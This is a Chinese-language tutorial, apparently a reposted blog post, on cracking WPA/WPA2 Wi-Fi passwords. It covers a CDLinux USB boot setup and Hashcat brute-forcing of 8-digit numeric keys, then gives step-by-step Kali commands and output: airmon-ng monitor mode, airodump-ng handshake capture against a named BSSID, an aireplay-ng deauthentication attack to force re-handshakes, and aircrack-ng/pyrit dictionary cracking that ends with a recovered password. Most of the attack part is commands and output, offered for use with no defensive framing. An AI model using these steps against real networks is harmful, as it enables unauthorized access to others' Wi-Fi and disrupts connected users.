
1、扫描无线网络获取握手包(,破解握手包,获取密码。其中抢包和跑包是最关键的两个步骤,要花很多时间。
2、CDLinux:一个小的Linux系统,用来抓包。它有中文界面,可以放入u盘。
3、Hashcat:一个极其强大的密码破解工具,支持GPU加速。除了WPA,还能破解md5、zip等密码。
5、运行CDLinux,保存抓包文件,容量512M以上,带无线网卡的PC:带外接无线网卡的笔记本或台式机都可以。最好有独立的显卡,可以提高包运行的效率。辅助工具:UltraISO、BOOTICE、grldr和menu.lst,用于从u盘启动CDLinux。
6、格式化u盘,文件系统为FAT32,卷标设置为CDLINUX,运行UltraISO,点击文件-打开-选择下载的CDLinux打开,点击左上方窗口的CDLinux,将右边窗口的CDLINUX目录文件复制到u盘根目录。
7、:拿包。需要一个安装了CDLinux的u盘。
8、跑包。需要Hashcat。跑包是整个过程中最重要的,核心思想是穷尽密码,这个环节比较耗时。穷尽所有密码当然是不现实的。想想常用的密码,基本都是8位纯数字,那就从8位纯数字密码开始。Hashcat正好符合要求。在GPU加速的情况下,运行一个8位纯数字密码大概需要15分钟。
首先需要有一台运行kali linux的机器,无论是虚拟机或物理机,一块支持监听模式的无线网卡root@kali:~# iwconfig wlan1 IEEE 802.11bg ESSID:off/anyMode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off eth0 no wireless extensions.lono wireless extensions.
查看无线网卡设备名
root@kali:~# airmon-ng start wlan1Found 2 processes that could cause trouble.If airodump-ng, aireplay-ng or airtun-ng stops working aftera short period of time, you may want to kill (some of) them!-e PID Name2772dhclient4415wpa_supplicantInterface Chipset Driverwlan1 Realtek RTL8187Lrtl8187 - [phy0](monitor mode enabled on mon0)
进入监听模式
airodump-ng mon0 会列出搜索到的所有无线网络
从中找到你要测试破解的,copy下来BSSID
root@kali:~/test# airodump-ng -w nenew -c 11 --bssid E4:D3:32:41:56:12 mon0 CH 11 ][ Elapsed: 1 min ][ 2014-09-12 23:31 ][ WPA handshake: E4:D3:32:41:56:12 BSSID PWR RXQ Beacons#Data, #/s CH MB ENC CIPHER AUTH ESSIDE4:D3:32:41:56:12 -44 53 17170 11 54e. WPA2 CCMP PSK TP-LINK_5612 BSSID STATIONPWR RateLostFrames Probe E4:D3:32:41:56:12 00:00:00:00:00:0000 - 1 018135 E4:D3:32:41:56:12 64:B4:73:40:60:5C -211e- 6e 07
当看到WPA handshake:说明抓到了握手包,就可以来破解了
如果一直抓不到,可以用如下命令来攻击,强迫重新握手
aireplay-ng -0 10 -a E4:D3:32:41:56:12 -c 64:B4:73:40:60:5C mon0 --ignore-negative-one
抓到握手包后,就可以用字典来跑密码了。
root@kali:~/test# aircrack-ng -w ./password.txt nenew-21.cap Opening nenew-21.capRead 18654 packets. # BSSID ESSID Encryption 1 D0:C7:C0:6E:53:53 TP-LINK_5353 WPA (1 handshake)Choosing first network as target.Opening nenew-21.capReading packets, please wait...
跑的速度如何取决于你机器的性能,更取决于你的字典
如果用物理机,有比较好的显卡,还可以用显卡来加速破解,效率比cpu高的多
kali linux下装显卡驱动,sdk等,参考如下链接
http://xiao106347.blog.163.com/blog/static/2159920782013113013549364
http://vistb.net/2011/08/how-to-crack-wifi-part-four/
http://blog.sina.com.cn/s/blog_56a70c040101exje.html
我这里用显卡,很快就跑出了密码
root@kali:~# pyrit -r nenew-21.cap -i password.txt -b D0:C7:C0:6E:53:53 attack_passthroughPyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.comThis code is distributed under the GNU General Public License v3+Parsing file 'nenew-21.cap' (1/1)...Parsed 14 packets (14 802.11-packets), got 1 AP(s)Tried 4420221 PMKs so far86496 PMKs per second.The password is 'qq123789'.
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)